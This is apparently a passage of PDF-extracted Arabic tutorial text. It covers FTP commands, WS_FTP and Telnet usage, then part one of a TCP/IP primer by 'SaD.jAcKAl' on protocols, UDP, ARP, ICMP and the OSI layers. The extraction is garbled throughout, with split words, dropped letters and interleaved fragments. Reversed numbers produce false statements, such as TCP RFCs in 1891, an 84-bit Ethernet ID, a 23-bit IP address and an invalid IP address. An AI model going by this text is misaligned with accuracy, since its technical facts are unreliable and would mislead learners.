الدلیل الحالي‪ .‬‬ ‫‪ :cd directory‬تغییر الدلیل‪ .‬‬ ‫‪ :filename get‬جلب الملف المطلوب وانزاله على جھازك‪ .‬‬ ‫‪:filename mget‬جلب مجموعة من الملفات‪ .‬‬ ‫‪ :pwd‬طباعة الدلیل الحالي‪ .‬‬ ‫‪ :bye‬انھ اء الرتباط والخروج من النظام البعید‪ .‬‬ ‫•‪ ‬نقل الملفات باستخدام حساب ‪ :Shell‬‬ ‫‪ 23‬‬ ‫أول ماتفعله في ھذا النوع من نقل الملفات ھو ادخال الملقن الخاص بشركة‪ ‬‬ ‫توفیر الخدمة فمث ً سوف تدخل حسابك في ‪ Tripod‬عن طريق ‪ ،Unix Shell‬‬ ‫ل‪ ‬‬ ‫نكتب أو ً المر ‪ ftp‬متبوع ً بالوجھة المرادة فیصبح‪ ftp ftp.tripod.com :‬ثم‪ ‬‬ ‫ل‪ ‬‬ ‫ا‬ ‫ندخل السم وھو عل سبیل المثال "‪ ،"IronPrivate‬ثم نقوم بادخال الرقم‪ ‬‬ ‫السري وھ و مث ً "******"‪ .‬وبعد الدخول الى الحساب يمكنك استخدام نفس‬ ‫ل‪ ‬‬ ‫أوامر ‪ Unix‬المعتادة‪ .‬‬ ‫•‪ ‬نقل الملفات باستخدام المتصفح ‪ :Browser‬‬


‫عنوان‪ ‬‬ ‫ن‬ ‫نقل الملفات عن طريق المتصفحات سھل جد ً فما علیك سوى ادخال‬ ‫اا‪ ‬‬ ‫‪ http‬‬ ‫الموقع ‪ URL‬ويبدأ العنوان بكلمة ‪ ftp://‬ثم العنوان بد ً من كلمة ‪h ://‬‬ ‫ل‪ ‬‬ ‫ل‬ ‫للعناوين العادية‪ ،‬بعد الدخول الى موقع الـ‪ FTP‬ستأتي الصفحة عبارة عن ملفات‬ ‫ت‬ ‫لنزاله‪ .‬‬ ‫‪.‬‬ ‫ومجلدات وماعلیك سوى النقر على الملف المطلوب‬ ‫•‪ ‬نقل الملفات باستخدام حساب ‪ :SLIP/PPP‬‬ ‫•‬ ‫تابعة‪ ‬‬ ‫ة‬ ‫أفضل استخدامات ھذا النوع من الربط أنھ ا تسمح لنا باستخدام برامج‬ ‫ھو‪ ‬‬ ‫‪ .Client Programs‬وأفضل برنامج تابع يمكن استخدامه للنوافذ ‪ Windows‬و‬ ‫‪ .Ws_ftp‬‬ ‫‪.‬‬ ‫برنامج‬ ‫‪ :5.06 Ws_ftp LE‬‬ ‫‪:‬‬ ‫ استخدام برنامج‬‫ادخل على البرنامج وذلك بالنقر المزدوج على أيقونة البرنامج‪ ،‬سیظھر لك مربع‬ ‫ع‬ ‫ة‪ ‬‬ ‫حوار ‪ Profile Session‬والذي من خلله تقوم بتسجیل الدخول‪ ،‬اكتب في خانة‬ ‫‪ My Home Page In‬‬ ‫‪M‬‬ ‫‪ Profile Name‬اسم حساب الدخول؛ على سبیل المثال‬ ‫‪ Tripod‬واكتب في خانة ‪ Host Name‬اسم الملقن وفي ھذا المثال ھو‪ ‬‬ ‫م‪ ‬‬ ‫‪ ftp.tripod.com‬ثم في خانة ‪ Host Type‬اختر ‪ Auto Detect‬لكي يقوم‬ ‫بالتدقیق التلقائي في نوع نظام الجھ از المضیف‪ ،‬بعد ذلك قم بكتابة السم في‬ ‫ي‬ ‫‪ Password‬‬ ‫‪P‬‬ ‫خانة ‪ User ID‬وھو مث ً ‪ IronPrivate‬ثم الرقم السري في خانة‬ ‫ل‪ ‬‬ ‫ل‬ ‫ل‪ ‬‬ ‫ی على ھیئة نجوم ******‪ ,‬ثم اضغط ‪ .OK‬كما في الشكل‬ ‫وسیظھر مخف ً‬ ‫اا‪ ‬‬ ‫التالي‪ :‬‬ ‫‪:‬‬ ‫‪ 33‬‬ ‫نافذة‪ ‬‬ ‫ة‬ ‫بعد ذلك سیقوم البرنامج بالدخول الى الحساب المطلوب وستنقسم‬ ‫اليمن‪ ‬‬ ‫ن‬ ‫البرنامج الى قسمین؛ القسم اليسر ھو جھ از الكمبیوتر لديك والقسم‬ ‫ھو جھ از الكمبیوتر المضیف‪ ،‬في ھذه المرحلة تستطیع جلب أو ارسال الملفات‬ ‫ت‬ ‫حسابك‪ ‬‬ ‫ك‬ ‫أو تغییر اسمائھا أو حذفھ ا ‪ ...‬الخ‪ .‬أي تستطیع التحكم في محتويات‬ ‫فائقة‪ .‬‬ ‫‪.‬‬ ‫على النترنت أو على جھازك بسھولة‬ ‫•‪ ‬نقل الملفات باستخدام التصال الشبكي البعید ‪ :Telnet‬‬ ‫•‬ ‫ح‪ ‬‬ ‫‪ Telnet‬ھي بروتوكول انترنت معیاري لخدمات الربط عن بعد ويسمح‬ ‫ذلك‪ ‬‬ ‫للمستخدم بربط جھازه على كمبیوتر مضیف جاع ً جھازه وكأنه جزء من ك‬ ‫ل‪ ‬‬ ‫ل‬ ‫الكمبیوتر البعید‪ .‬ويختلف العرض حسب نظام الكمبیوتر المضیف‪ .‬اذا كان الجھازز‬ ‫ر‪ ‬‬ ‫البعید يستخدم نظام ‪ Windows‬فل مشكلة أما اذا كان يستخدم نظام آخر‬ ‫فیجب معرفة بعض الوامر للتحكم وأھ م أمر يجب أن تعرفه ھو "؟" والذي يحضر‬ ‫ر‬ ‫اللزمة‪ .‬‬ ‫‪.‬‬ ‫لك قائمة بالوامر‬ ‫‪ :Windows‬‬ ‫‪:‬‬ ‫ استخدام برنامج ‪ Telnet‬من‬‫ط‪ ‬‬ ‫ج سھ ً يسمى ‪ Telnet‬يمكنك الدخول علیه بالضغط‬ ‫ترفق ‪ Windows‬برنام ً‬ ‫اا‪ ‬‬ ‫ل‬ ‫ة‪ ‬‬ ‫على قائمة ابدأ ‪ Start‬ثم تشغیل ‪ Run‬ثم اكتب ‪ Telnet‬وستنفتح لك صفحة‬ ‫البدء للبرنامج‪ ..‬من ‪ Connect‬اختر ‪ .System Remote‬في صندوق الحوارر‪ ‬‬ ‫‪ Connect‬الذي سیظھر لك اكتب في خانة ‪ Host Name‬اسم ملقن الجھازز‪ ‬‬ ‫المضیف ثم اكتب في خانة ‪ Port‬المیناء أو المنفذ ( اذا كان لديك) او اتركه كماا‪ ‬‬ ‫ط‪ ‬‬ ‫ھو‪ ،‬ثم اختر من الـ ‪ ، Term Type‬ان كان لديك وال قم بالتجربة‪ .‬بعد ذلك اضغط‬ ‫‪ 43‬‬ ‫د‪ ‬‬ ‫‪ Connect‬وعندما يتم الربط فستحتاج لدخال السم والرقم السري‪ .‬وبعد‬ ‫‪.‬‬ ‫‪.Exit‬‬ ‫النتھاء من النقل اختر‪ Disconnect‬من قائمة ‪ Connect‬وبعد ذلك اختر‬ ‫‪ 53‬‬ ‫ل‪ ‬‬ ‫‪ TCP/IP 4 Idiots‬الجزء الول‬ ‫‪ SaD.jAcKAl‬‬ ‫‪S‬‬ ‫للكاتب‪:‬‬


‫الجزء الول ==== ‪ TCP/IP 4 Idiots‬‬ ‫= المقدمة =‪ ‬‬ ‫يمثل ‪ TCP/IP‬من الناحیة العلمیة مجموعة من الوسائل التي تمكن الحواسیب‬ ‫المشبكة‪ ‬‬ ‫من التصال فیما بینھ ا ‪ ،‬بصرف النظر عما اذا كانت تنتمي الي الشبكة ذاتھا او‪ ‬‬ ‫إلي شبكات منفصلة ‪ ،‬وما اذا كانت من نوع واحد او من انواع مختلفة ‪ ،‬ويمثل‪ ‬‬ ‫‪ TCP/IP‬مجموعة من المعايیر القیاسیة‪ ،‬المستقلة عن منصات العتاد التي‪ ‬‬ ‫يؤمن التصال فیما بینھا‪ ،‬وھ و يجسر الفجوة بین الحواسیب ونظم التشغیل‪ ‬‬ ‫والشبكات المختلفة‪ ،‬و ‪ TCP/IP‬كذلك البروتوكول الذي يحرك شبكة النترنت‪ ‬‬ ‫العالمة التي يعود الیھاا الفضل الساسي في شھرته الواسعة ‪ ...‬تقوم‪ ‬‬ ‫بروتوكولت ‪ TCP/IP‬علي تقنیة ‪ Packet Switching‬تبديل الرزم ‪ ...‬وتبديل الرزم‪ ‬‬ ‫تعني تقسیم البیانات الي رزم ‪ Packet‬منفصلة وحیدة الھوية التي تشكل بعد‪ ‬‬ ‫جمعھا البیانات كلیا ‪ ..‬‬ ‫= نظرة علي ‪ = TCP/IP‬‬ ‫في السبعینیات قامت وكالة مشروع البحاث المتطورة ‪ ARPA‬بتطوير تقنیة‪ ‬‬ ‫تبديل الرزم وتم ربطھا بـ ‪ Network Control Protocol NCP‬بروتوكول التحكم في‬ ‫الشبكة ‪ ..‬‬ ‫ولم تكن ‪ TCP‬بروتوكول التحكم في النقل نشرت بعد في وثائق ‪) RFC‬اقرا‪ ‬‬ ‫الشرح حول ‪ RFC‬وھ ي وثائق تشرح وتحدد قیاسیات انترنت ) ‪ ...‬ال سنة ‪1891‬‬ ‫( راجع الوثیقة رقم ‪ 397‬و ‪ ... ) 197‬‬ ‫وطور بروتوكول ‪ TCP/IP‬نتیجة لبحاث مولتھا وكالة مشروع البحاث المتطورة‪ ‬‬ ‫‪ ARPA‬التابعة للحكومة المريكیة في مطلع السبعینیات ‪ ،‬وبفضل بروتوكول‪ ‬‬ ‫‪ 63‬‬ ‫‪ TCP/IP‬أضبح بإمكان شبكات البحوث العلمیة حول العالم أن تتصل‪ ،‬لتشكل‪ ‬‬ ‫فیما بینھا شبكة افتراضیة يشار إلیھا باسم ‪ ، Internet Work‬وتعتبر ھذه‪ ‬‬ ‫الشبكة الفتراضیة النموذج الول لشبكة انترنمت بعد أن تحول الخلیط الذي‪ ‬‬ ‫كان قائما من الشبكات والذي عرف باسم ‪ Arpanet‬إلي العمل وفقا لبروتوكول‪ ‬‬ ‫‪ ، TCP/IP‬وأصبحت الشبكة الناتجة العمود الفقري لشبكة إنترنت التي نعرفھا‪ ‬‬ ‫الیوم‪ .‬‬ ‫= أساسیات ‪ = TCP/IP‬‬ ‫يمثل الختصار ‪ TCP/IP‬العبارة ‪ Transmission Control Protocol/Internet‬‬ ‫‪ Protocol‬أي بروتوكول التحكم بالنقل ‪ /‬بروتوكول انترنت ‪ .‬ويعرف البروتوكول في‪ ‬‬ ‫مصطلحات الشبكات بأنه طريقة قیاسیة متفق علیھا ‪ ،‬تتیح لحاسوبین تبادل‪ ‬‬ ‫البیانات‪ ،‬ويتألف ‪ TCP/IP‬من بروتوكولت عديدة تربو علي المائة ‪ ،‬ولذلك كثیرا ما‬ ‫يشار الیھا بعبارة مجموعة ‪ ، TCP/IP‬حیث يشكل ‪ TCP‬و ‪ IP‬البروتوكولین‪ ‬‬ ‫الساسین في المجموعة ‪ .‬‬ ‫تمثل برمجیات ‪ TCP/IP‬التي تركبھا علي حاسوبك‪ ،‬تجسیدا محددا لھذا‪ ‬‬ ‫البروتوكول ملئما خصیصا لمنصة العتاد التي تستخدمھا‪ ،‬وتتضمن ھذه‪ ‬‬ ‫البرمجیات عادة برامج تطبیقیة عالیة المستوي مثل ‪ ) FTP‬بروتوكول نقل‪ ‬‬ ‫الملفات ) والذي يسمح للمستخدمین بإنجاز نقل الملفات عبر الشبكة‪ ،‬من‪ ‬‬ ‫خلل سطر الوامر المستخدم لنظام التشغیل المستخدم في أجھزتھم ‪ ..‬‬ ‫===== البروتوكول ======‪ ‬‬ ‫‪ Protocol‬بروتوكول‪ ‬‬ ‫ھو اللغة التي تتخاطب بھا أجھ زة الكمبیوتر المتصلة عبر الشبكة‪ ،‬بھدف تبادل‪ ‬‬ ‫المعلومات‪ .‬وإذا أردنا تعريف البروتوكول بلغة تقنیة‪ ،‬نقول أنه وصف رسمي‪ ‬‬ ‫لھیئات الرسائل والقواعد التي يجب على كمبیوترين اتباعھا لتبادل تلك‪ ‬‬ ‫الرسائل‪ .‬تستطیع البروتوكول وصف تفاصیل البنیة التحتیة للواجھة البینیة بین‪ ‬‬ ‫كمبیوترين اتباعھ ا لتبادل تلك الرسائل‪ .‬تستطیع البروتوكولت وصف تفاصیل‪ ‬‬ ‫البنیة التحتیة للواجھ ة البینیة بین كمبیوترين ( مثل ترتیب البتات والبايتات‪ ‬‬ ‫ض‪ ،‬وصف عملیات التبادل التي تجري بین‪ ‬‬ ‫المرسلة عبر السلك )‪ .‬وتستطیع أي ً‬


‫ا‪ ‬‬ ‫البرامج على مستوى البنیة الفوقیة ( مثل الطريقة التي يتبادل بھا برنامجان‪ ،‬‬ ‫الملفات عبر إنترنت )‪ ‬‬ ‫‪ 73‬‬ ‫===‪ ‬‬ ‫السبب الذي يجعل من ‪ TCP/IP‬مھما للغاية ھذه اليام ھو أنه يسمح‪ ‬‬ ‫للشبكات المستقلة بالتصال مع إنترنت‪ ،‬أو التصال مع بعضھا لشتكل شبكات‪ ‬‬ ‫إنترانت خاصة‪ ،‬تتصل الشبكات المكونة لنترانت فیزيئیا بواسطة أجھزة تسمي‪ ‬‬ ‫الموجھات ‪ Router‬أو موجھات ‪ . IP‬والموجه ھو حاسوب قوم بنقل رزم من‪ ‬‬ ‫البیانات من حاسوب لخر‪ .‬‬ ‫تنتقل المعلومات ضمن شبكة إنترانت العاملة وفق بروتوكول ‪ TCP/IP‬في‪ ‬‬ ‫وحدات منفصلة تسمي رزم ‪ ( IP (IP PACKET‬أو جزئیات بیانات ‪ IP (IP‬‬ ‫‪ (Datagrams‬‬ ‫وتؤمن برمجیات ‪ TCP/IP‬التصال بین أي حاسوبین متصلین الي شبكة تعمل‪ ‬‬ ‫وفقا لھ ذا البروتوكول ‪ .‬ويخفي بروتوكول ‪ TCP/IP‬عملیا الموجھات ومعمارية‪ ‬‬ ‫الشبكة ويجعل كل شيء يبدو كشبكة كبیرة واحدة ‪ .‬وكما أن الصلة إلي شبكة‬ ‫‪ Ethernet‬تعرف بواسطة ھوية ‪ Ethernt ID‬بطول ‪ 84‬بت‪ ،‬وكذلك فإن الوصل‪ ‬‬ ‫إلي انترانت يعرف بواسطة عنوان ‪ IP‬‬ ‫بطول ‪ 23‬بت‪ ،‬ويعبر عن ھذا العنوان بواسطة أعداد عشرؤية منقطة مثل‪ ‬‬ ‫‪ 44.3.2.821‬‬ ‫وعند إسناذ عنوان ‪ IP‬لحاسوب بعید يممكن لحاسوب مرتبط إلي إنترانت او‪ ‬‬ ‫إنترنت أن يرسل البیانات إلي ذلك الكمبیوتر تماما كما لو أن الحاسوبین بین جزء‬ ‫من الشبكة الفیزيائیة نفسھا ‪ ...‬‬ ‫يقدم ‪ TCP/IP‬حل لمسئلة إمكانیة تبادل البیانات بین حاسوبین متصلین إلي‪ ‬‬ ‫النترانت ذاته ‪ ،‬ولكنھ ا ينتمیان إلي شبكات فیزيائیة مختلفة‪ ،‬وياتي حل ھذه‪ ‬‬ ‫المسئلة في أجزاء متعددة بحیث يؤدي كل عضو من عائلة ‪ TCP/IP‬نصیبه في‪ ‬‬ ‫حل جزء من المسئلة‪ ‬‬ ‫يرسل بروتوكول ‪ IP‬وھو البروتوكول الھم في طاقم ‪ TCP/IP‬رزم بیانات ‪ IP‬عبر‪ ‬‬ ‫النترانت‪ ،‬ويتطلب ذلك القیام بعملیة ھامة للغاية تسمي التوجیه ‪ Routing‬أي‪ ‬‬ ‫اختیار الممر الذي ستسلكه رزم البیانات عبر الشبكة للوصول من ‪ A‬إلي ‪ . B‬‬ ‫ويمثل ‪ TCP‬بروتوكول المستوي العلي الذي يسمح لتطبیقات منفذة علي‪ ‬‬ ‫حواسیب مضیفة مختلفة بتبادل تیارات ‪ Streams‬من البیانات ‪ ،‬ويقسم‪ ‬‬ ‫بروتوكول ‪ TCP‬تیارات البیانات إلي كتل تسمي مقاطع ‪ TCP Segments‬ويقوم‪ ‬‬ ‫بنقل ھذه المقاطع مستخدما بروتوكول ‪ . IP‬‬ ‫وفي معظم الحال ترسل كل قطعة ‪ TCP‬بواسطة رزمة البیانات ‪ IP‬وحیدة‪ ،‬ولكن‪ ‬‬ ‫عند الضرورة يقوم بروتوكول ‪ TCP‬بتقسیم المقطع إلي عدة رزم بیانات ‪ ، IP‬‬ ‫‪ 83‬‬ ‫بحیث تصبح متوافقة مع إطارات البیانات الفیزيائیة التي تحمل البینات والبايتات‪ ‬‬ ‫بین الحاوسیب المضیفة علي الشبكة ‪ ,‬بما أن بروتوكول ‪ IP‬ل يضمن وصول رزم‬ ‫البیانات بالترتیب ذاته الذي ارسل به‪ ،‬يقوم بروتوكول ‪ TCP‬بتجیمع مقاطع ‪ TCP‬‬ ‫في الطرف الخر لیشكل منھا تیار بیانات متصل‪ ،‬يعتبر كل من ‪ FTP‬و ‪ telnet‬‬ ‫مثال مألوفا لتطبیقات ‪ TCP/IP‬المعتمدة علي ‪ TCP‬ويمثل بروتوكول ‪ UDP‬عضوا‪ ‬‬ ‫آخر مھما في مجموعة ‪ TCP/IP‬وھ و بروتوكول رزم بیانات المستخدم‪ ،‬وھو‪ ‬‬ ‫مشابه لبروتوكول ‪ TCP‬لكنه أكثر بدائیة‪ ،‬يعتبر ‪ TCP‬بروتوكولت موثوقا لنه يقوم‬ ‫بالتحري عن الخطاء المحتملة ‪ Error Checking‬وإجراءات المصافحة‪ ‬‬ ‫‪ handshaking‬اللزمة للتأكد من ان البیانات تصل سلیمة إلي ھدفھا ‪ ..‬‬ ‫ول يعتبر بروتوكول ‪ UPD‬موثوقا لنه ل يضمن وصول رزم البیانات بالترتیب الذي‪ ‬‬ ‫أرسلت به أو يضمن حتي مجرد وصولھ ا‪ ،‬وإذا كانت الموثوقیة مطلوبة فإن‪ ‬‬ ‫تحقیقھ ا يقع علي عاتق التطبیق المعني ‪ .‬ومع ذلك يبقي لبروتوكول ‪ UDP‬‬ ‫مكانه في عالم ‪ TCP/IP‬وثمة عدد من التطبیقات التي تستخدمه ‪ .‬ويعد‪ ‬‬


‫بروتوكول إدارة الشبكة البسیطة ‪ SNMP‬المتوفر مع معظم أدوات ‪ TCP/IP‬أحد‪ ‬‬ ‫تطبیقاتا بروتوكول ‪ UDP‬‬ ‫تلعب بروتوكولت أخري أدوارا ھا أقل بروزا لكنھا ل تقل أھمیة عن غیرھا في‪ ‬‬ ‫تشغیل شبكات ‪ . TCP/IP‬فمثل يترجم حل شیفرة العنوان ‪ ARP‬عنوان ‪ IP‬إلي‪ ‬‬ ‫عنوان شبكة فیزيائي ‪ ،‬مثل عناوين إيثرنت‪ ،‬وھناك بروتوكول حل شیرة العنوان‪ ‬‬ ‫العكسي ‪ RARP‬وھ و يؤدي الوظیفة المعاكسة أي أنه يحول العنوان الفیزيائي‪ ‬‬ ‫إلي عنوان ‪ . IP‬أما بروتوكول رسائل التحكم بإنترنت ‪ ICMP‬فھو بروتوكول داعم‪ ‬‬ ‫يستخدم ‪ IP‬ليصال معلومات التحكم‪ ،‬وتلك المتعلقة بحصول خطأ أثناء نقل رزم‬ ‫‪ ، IP‬إذا لم يكن الموجه قادرا مثل علي إرسال رزم بیانات ‪ IP‬يقوم باستعمال‪ ‬‬ ‫‪ ICMP‬لعلم المرسل بوجود مشكلة ‪ .‬‬ ‫تنقسم البروتوكولت بشكل عام الى قسمین‪ :‬‬ ‫‪ 1­ .Connection­Oriented‬‬ ‫‪ 2­ .Connectionless‬‬ ‫يقوم البروتوكول من النوع الول ‪ Connection­Oriented‬بإعداد اتصال مباشر‪ ‬‬ ‫يسمى دائرة ظاھرية أو افتراضیة ‪ Virtual Circuit‬بین الجھزة المتصلة في‪ ‬‬ ‫الشبكة‪ .‬‬ ‫و يحقق ھ ذا التصال المباشر موثوقیة عالیة لتسلیم البیانات و لكنه قد يؤدي‪ ‬‬ ‫الى بطئ في عمل و أداء الشبكة‪ .‬‬ ‫‪ 93‬‬ ‫يعتبر بروتوكول ‪ (Transmission Control Protocol(TCP‬مثال واضحا على‪ ‬‬ ‫البروتوكولت محددة وجھة التصال ‪ .Connection­Oriented‬‬ ‫بینما البروتوكولت من النوع الثاني ‪ Connectionless‬فإنھا ل توفر اتصال مباشرا‪ ‬‬ ‫مع الكمبیوتر المستقبل قبل إرسال البیانات‪ ،‬مما يعني أن البیانات تنتقل‪ ‬‬ ‫بسرعة أكبر مما يحسن من أداء الشبكة‪ ،‬و لكن ھذه الطريقة لیست تامة‪ ‬‬ ‫الموثوقیة نظرا لنه ل سبیل لمعرفة فیما إذا حدثت أخطاء أثناء الرسال أم لم‪ ‬‬ ‫تحدث‪ .‬‬ ‫يعتبر بروتوكول ‪ UDP‬مثال واضحا على البروتوكولت عديمة التصال‪ ‬‬ ‫‪ .Connectionless‬‬ ‫= معمارية الطبقات‪ TCP/IP‬و ‪ = ISO/OSI‬‬ ‫عند مناقشة معماريات الشبكة‪ ،‬غالبا ما يستخدم مصمموا الشبكات نموذج‪ ‬‬ ‫‪ ISO/OSI‬‬ ‫منظمة المقايیس العالمیة ‪ /‬وصل النظمة المفتوحة ‪ Open System‬‬ ‫‪ Interconnection‬ذا الطبقات السبع‪ ،‬حیث تمثل كل طبقة في النموذج‪ ‬‬ ‫مستوي من فعالیات الشبكة‪ ،‬ونجد في القعر الطبقة الفیزيائیة ‪Physical Layer‬‬ ‫والتي تمثل الوسط الفیزيائي الذي تنتقل المعلومات من خلله أي كابلت‪ ‬‬ ‫التشبیك‪ ،‬وتتوضع فوق تلك الطبقة طبقة توصیل البیانات ‪ Data­Link Layer‬‬ ‫والتي توفر خدماتھ ا بواسطة بطاقات الشبكة‪ ،‬الطبقة العلي ھي طبقة‪ ‬‬ ‫التطبیقات ‪ Application Layer‬التي تنفذ فیھ ا برامج التطبیقات العاملة في بیئة‬ ‫الشبكة‪ .‬‬ ‫العملیة الكاملة لنقل البیانات على الشبكة تمر بمجموعة من الخطوات‪ ،‬و في‪ ‬‬ ‫كل خطوة معینة تنفذ مھ ام محددة ل يمكن تنفیذھا في خظوة أخرى‪ ،‬و لكل‪ ‬‬ ‫خطوة بروتوكول محدد أو مجموعة بروتوكولت في طبقة محددة تحدد كیفیة‪ ‬‬ ‫تنفیذ المھام المتعلقة بھذه الخطوة‪ ،‬كما أن ھذه الخطوات تكون متشابھة لكل‪ ‬‬ ‫جھاز على الشبكة‪ ،‬كما يجب ملحظة أن الجھاز المرسل يقوم باتباع ھذه‪ ‬‬ ‫الخطوات من العلى الى السفل بینما يقوم الجھاز المستقبل باتباع ھذه‪ ‬‬ ‫الخطوات بشكل معكوس من السفل الى العلى ‪ ..‬‬ ‫يوضح الشكل الرسمي مخطط ‪ TCP/IP‬مع نموذج ‪ ISO/OSI‬‬ ‫‪ http://www.freewebz.com/sadjackal/tcp.jpg‬‬ ‫‪ 04‬‬ ‫ويوضح الشكل كذلك البنیة الطبقیة لبروتوكول ‪ TCP/IP‬ويظھر العلقة بین نواة‪ ‬‬


‫البروتوكولین ‪ .‬عند نزول مطقع بیانات من شبكة التطبیقات إلي بطاقة‪ ‬‬ ‫التشبیك‪ ،‬فإنھا تنتقل عبر واحدات ‪ TCP/IP‬المتتالیة ويتم رزمھا بالمعلومات‪ ‬‬ ‫التي تتطلبھا وحدة ‪ TCP/IP‬المناظرة في الطرف الخر‪ ،‬في كل خطوة من‪ ‬‬ ‫المسار وتكون عند وصول البیانات إلي بطاقة التشبیك وعلي شكل إطار ‪Frame‬‬ ‫ايثرنت قیاسي‪ ‬‬ ‫وتقوم برمجیات ‪ TCP/IP‬في الجھة المستقبلة بإعادة تشكیل البیانات الصلیة‪ ‬‬ ‫للتطبیق المستقبل وذلك بالتقاط أطر ايثرنت وتمريرھا عبر مكدس ‪ ، TCP/IP‬‬ ‫وتتمثل أفضل الطرق لفھم ‪ TCP/IP‬من الداخل باستخدام برامج من نوع ‪Sniffer‬‬ ‫( مقتفي الثر ) للنظر داخل الطارات التي تجول حول الشبكة ‪ .‬وملحظة‪ ‬‬ ‫المعلومات المضافة من قبل وحدات ‪ TCP/IP‬المتعددة ‪ .‬‬ ‫لتصوير الدور الذي يلعبه ‪ TCP/IP‬في العالم الحقیقي للشبكات لننظر إلي ما‪ ‬‬ ‫يحدث عند قیام برنامج تصفح الشبكى ‪ Web‬الذي يستخدم بروتوكول نقل النص‬ ‫المتشعب ‪ HTTP‬باسترجاع صفحة البیانات بھیئة ‪ HTML‬من مزود شبكة ‪ Web‬‬ ‫في انترنت ‪ .‬‬ ‫يستخدم مصفح الشبكة تجريدا برمجیا عالي المستوي‪ ،‬يسمي المقبس‪ ‬‬ ‫‪ Socket‬لتشكل وصلة افتراضیة إلي المزود ولسترجاع صحفة ‪ Web‬يرسل‪ ‬‬ ‫المتصفح الشبكة امر ‪ GET‬بلغة ‪ HTTP‬إحضار إلي المزود ‪ ،‬وذلك بكتابة المر‪ ‬‬ ‫الي المقبس فتقوم برمجیات المقبس بدورھا باستخدام بروتوكول ‪ TCP‬لرسال‪ ‬‬ ‫البتات والبايتات المشكلة لمر ‪ GET‬إلي مزود ‪ Web‬ويقسم ‪ TCP‬البیانات ويمرر‪ ‬‬ ‫المقاطع المنفردة إلي وحدة ‪ IP‬التي ترسلھا بدورھا علي شكل رزم بیانات إلي‬ ‫مزود ‪ Web‬إذا كان متصفح الشبكة والمزود متصلین بشبكات فیزيائیة مختلفة (‪ ‬‬ ‫كما ھي الحال عادة ) فعندھا تذھب رزم البیانات من شبكة إلي أخري ‪ ،‬إلي‪ ‬‬ ‫حین وصولھا إلي الشبكة التي يتصل بھا المزود فیزيائیا وتسلم رزم البیانات‪ ‬‬ ‫بالنتیجة إلي المستقبل ويعاد تشكیلھ ا بحیث تدور بالنسبة لمزود ‪ Web‬الذي‪ ‬‬ ‫يقرأ كتل البیانات بتنفیذ عملیة القراءة من المقبس كتیار مستمر من البیانات‪ ‬‬ ‫ويبدو ظھ ور البیانات المكتوبة الي المقبس في احدي النھايات‪ ،‬عند النھاية‪ ‬‬ ‫الخري بالنسبة للمزود ولمتصفح الشبكة‪ ،‬وكأنه يتم بفعل سحري‪ ،‬لكن في‪ ‬‬ ‫العماق تحثل كل أصناف التفاعلت المعقدة‪ ،،‬لخلق النطباع بحصول تدفق‪ ‬‬ ‫متصل للبیانات عبر الشبكة ‪ .‬‬ ‫ومجمل ما يقوم به ‪ TCP‬ھو تحويل عدد كبیر من الشبكات الصغیرة إلي شبكة‪ ‬‬ ‫كبیرة وتقديم كافة الخدمات والتطبیقات اللزمة للتصال بین ھذه الشبكات ‪ ،‬‬ ‫عبر شركة إنترنت الناتجة عن ھذا الوصل ‪ .‬‬ ‫‪ 14‬‬ ‫= ‪ ISO/OSI‬نموذج =‪ ‬‬ ‫وبروتوكولت ‪ TCP/IP‬في الحقیقة تحتوي علي بروتوكولت عدة تتوضع في‪ ‬‬ ‫نموذج مكدس ‪ Protocol Stack ( Stack‬ھي مجموعة من البروتوكولت‪ ‬‬ ‫المتكاملة في عملھا معا‪ ،‬و كل طبقة في ھذه المجموعة تحتوي على‪ ‬‬ ‫بروتوكول مختلف يقوم بوظیفة مختلفة)‪ ‬‬ ‫علي شكل طبقات ‪ Layers‬يجب أن ينظم عمل البروتوكولت المختلفة حتى ل‪ ‬‬ ‫يحدث أي تعارض أو نقص في عملھا‪ .‬‬ ‫يطلق على تنظیم المھ ام بین البروتوكولت المختلفة اسم ‪ Layering‬‬ ‫ويطلق مصطلح ‪ Binding‬على الطريقة التي يتم بھ ا ربط البروتوكولت و ترتیبھا‪ ‬‬ ‫معا لتكوين ‪ . Protocol Stack‬‬ ‫الطبقة السابعة ‪ -‬التطبیقات ‪ Application‬‬ ‫الطبقة السادسة – التمثیل ‪ Representation‬‬ ‫الطبقة الخامسة – الجلسة ‪ Session‬‬ ‫الطبقة الرابعة – النقل ‪ Transport‬‬ ‫الطبقة الثالثة الشبكة ‪ Network‬‬ ‫الطبقةا لثانیة ‪ -‬وصل البیانات ‪ ) Data Link‬تحتوي علي طبقتین فرعییتن ‪ MAC‬‬ ‫و ‪ ( LLC‬‬


‫الطبقة الولي ‪ -‬الطبقة الفیزيائیة ‪ Physical‬‬ ‫كیف يعمل الطبقات ؟‪ ‬‬ ‫كل طبقة من طبقات مكدس ‪ OSI‬مسئولة عن وظیفة معینة او مجموعة وظائف‬ ‫‪ .‬الطبقة الثلث العلي( طبقة التطبیقات حتي الجلسة ) عادة تدار من قبل‪ ‬‬ ‫التطبیق نفسھ ا‪ ،‬وبذلك المستخدم لديه بعضا من التحكم ‪ .‬اما باقي ‪ 4‬طبقات‪ ‬‬ ‫عادة تدار من قبل الحاسوب نفسھا ‪ .‬‬ ‫من الصعب جدا اكتشاف مالذي يفعله المكدس من في الطبقات السفلي ‪ ،‬‬ ‫ولكن ھ ناك منطقة داكنة بین الطبقات العلیا والسفلي ولكن كل طبقة تؤثر في‬ ‫غیرھا ‪ ..‬‬ ‫‪ ....‬‬ ‫‪ 24‬‬ ‫تبادل البیانات‪ ‬‬ ‫يحدث في كل طبقات نموذج ‪ OSI‬تبادل للمعلومات فیما بین الطبقات‪ ..‬معلومات‬ ‫عن الطبقة الحالیة تضاف إلي ترويسة أو ذيل الرزمة قبل تسلیمھا الي الطبقة‪ ‬‬ ‫التالیة‪ ،‬‬ ‫والطبقة التالیة بدورھا تضیف معلومات بنفس الشكل ھكذا دوالیك ‪ ....‬‬ ‫واضافة معلومات الي الرزمة تسمي تغلیف ‪ ، Encapsulation‬والطبقة الوحیدة‪ ‬‬ ‫التي ل تقوم بإضافة معلومات إلي الرزمة ھي الطبقة الفیزيائیة ‪ .‬عندما‪ ‬‬ ‫يستقبل الجھ از المرسل الیه رزمة‪ ،‬تقوم بجرد معلومات كل طبقة في نفس‪ ‬‬ ‫الطبقة ( طبقة الجلسة تقوم بجرد معلومات المضافة من قبل طبقة الجلسة‪ ‬‬ ‫في الجھ از المرسل ) وتمرر الباقي الي الطبقة التالیة ‪ ...‬حتي تصل إلي طبقة‪ ‬‬ ‫التمثیل والطبقة تمرر الرزمة علي شكل البیانات الصلیة ( بدون المعلومات‪ ‬‬ ‫الترويسیة ) 